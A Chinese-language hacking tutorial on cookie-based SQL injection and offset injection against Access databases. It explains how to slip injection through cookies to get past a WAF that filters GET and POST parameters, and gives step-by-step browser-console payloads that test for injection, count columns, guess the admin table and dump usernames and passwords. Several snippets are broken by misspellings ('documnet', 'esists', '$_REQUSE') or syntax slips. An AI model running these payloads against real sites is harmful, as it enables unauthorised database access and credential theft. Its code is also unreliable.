本文内容:
- Cookie注入简介
- Cookie注入的核心
- 怎么修改Cookie
- Access数据库注入介绍
- Cookie注入具体流程
- 偏移注入使用场景
- 偏移注入具体流程
前言:数据库有很多:
Mysql、Access、Mssql、Oracle
不同的数据库,虽然语句蕾西,但是在渗透测试的时候是不同的。
1,Cookie注入简介:
cookie:就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获得了管理员的Cookie,你可以无需密码直接登录管理。
访问网站,协议是:HTTP协议,HTTP协议它是无状态的。
无状态:就是它不知道是谁访问,所以就设置了Cookie,Cookie就相当于身份证,通过一串字符串代替。
Cookie它并不安全,没有绝对的安全,用户的体验性和安全是需要平衡的。
2,Cookie注入的核心:
在很多时候开发人员在开发的时候为了考虑到多种接收传参,在接收传参的时候,都是用很多种方式接收。
例如:
PHP中的$_REQUSE[]可以获取POST|GET|COOKIE传参。
如果说开发用了$_REQUSE来接收参数。
然后POST和GET传参被waf拦截了,我们就可以尝试Cookie传参,有可能waf没有对Cookie传参进行处理,,那样我们不就可以绕过。
$_REQUSE php版本低于5.4会接收Xookie传参,所以注入时,也可以先查询一下数据库版本。
3,怎么修改Cooke:
方法一:
使用burpsuite抓取数据包,添加一个Cookie字段在请求头里。
注意:Cookie传参值需要URL编码。
方法二:
用js来设置Cookie
按F12调出浏览器开发者工具,选择Console,打开浏览器的控制台,输入设置js的语句就可以了。
比如:documnet.cookie="id="+escape("xx")
escape:是一个编码函数,这个函数会进行一次URL编码。
方法三:
F12——Application——Cookies,直接双击修改。
4,Access数据库注入
Access数据库在判断回显点的时候,必须接一个表名,没有别的库,只有一个库名,不用考虑库名。
不知道表名:只能靠猜,不过有几个常用的表,比如admin、user、news、job。
Access数据库,没有系统自带表,想要获取表名和字段名,方法只有靠爆破。
账号和密码一般在盛行Access数据库的年代,都在admin表的username和password字段中。
esists:这个函数就是用来检查表名是否存在,原理就是去检查子查询能否查询到数据,如果能,则返回True。
5,Cookie注入的流程:
例如:
获取admin表的账号和密码,账号和密码的字段名分别是username、password,输出点是2,3。
1.判断是否存在注入:
在URL栏中直接输入and 1=1 和and 1=2
如果被拦截了,我们就需要测试一下Cookie是否被拦截:
在浏览器控制台:输入js语句:
document.cookie="id="+escape("xx and 1=1")
document.cookie="id="+escape("xx and 1=2")
2.判断当前页面字段数:
document.cookie="id="+escape("xx order by 1")
3.判断想要获取数据的表名:
document.cookie="id="+escape("xx and (exists(select * from admin))")
4.查看输出点:
document.cookie="id="+escape("xx select 1,2,3 from admin")
5.判断字段名并输入账号和密码:
document.cookie="id="+escape("xx select 1,username,password from admin")
6,偏移注入使用场景:
在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够,又猜不到表名、字段名的情况下,我们可以使用偏移注入
像SQLMAP之类的工具实际上就是爆破字段的名字,但是如果字段名称比较奇葩,工具也就无可奈何了。
无法查询表名:强行爆破
无法查询字段名:偏移注入:纵然不知道表名,但是还是可以获取数据的。
用法:
admin.*就是admin表里所有的字段。
select * from admin
select admin.* from admin
这两句是一样的。
7,偏移注入的步骤(以Access为例):
1.判断注入点:
当在url中输入and 1=1和and1=2时,出现错误提示,说明Get传参被处理了,我们就需要看看Cookie传参是否没有被处理。
使用js代码在控制台判断。
document.cookie="id="+escape("xx and 1=1")
document.cookie="id="+escape("xx and 1=2")
2.order by 判断字段数:
documnet.cookie="id="+escape("xx order by 1")
3.判断表名:
documnet.cookie="id="+escape("xx and (esists(select * from admin))")
4.联合查询(判断输出点):
注意:
字段数相同
注入点的表的字段一定要大于查询的表。
top x取x条数据,一定要降序,才能达到limit的效果。
documnet. cookie="id="+escape("xx union select 1,2,3...... from admin")
5.获取表中列数(知道存在几列以及输出点):
document.cookie="id="+escape("xx union select 1,2,3......from admin")
6.开始偏移注入:
documnet.cookie="id="+escape("xx union select 1,2,admin.*, from admin")
注意:有的输出点可能在网上让一些东西所遮挡住了,所以我们要查看一下网页代码。
与君共勉:
在光芒万丈之前,
我们都要欣然接受眼下的难堪和不易,
接受一个人的孤独和偶尔的无助,
认真做好眼前的每件事,
你想要的都会有。